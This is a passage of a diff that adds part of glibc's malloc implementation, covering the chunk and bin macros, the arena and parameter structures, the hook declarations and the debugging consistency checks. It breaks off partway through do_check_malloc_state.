+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr ("corrupted size vs. prev_size");			      \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr ("corrupted double-linked list");			      \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr ("corrupted double-linked list (not small)");   \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
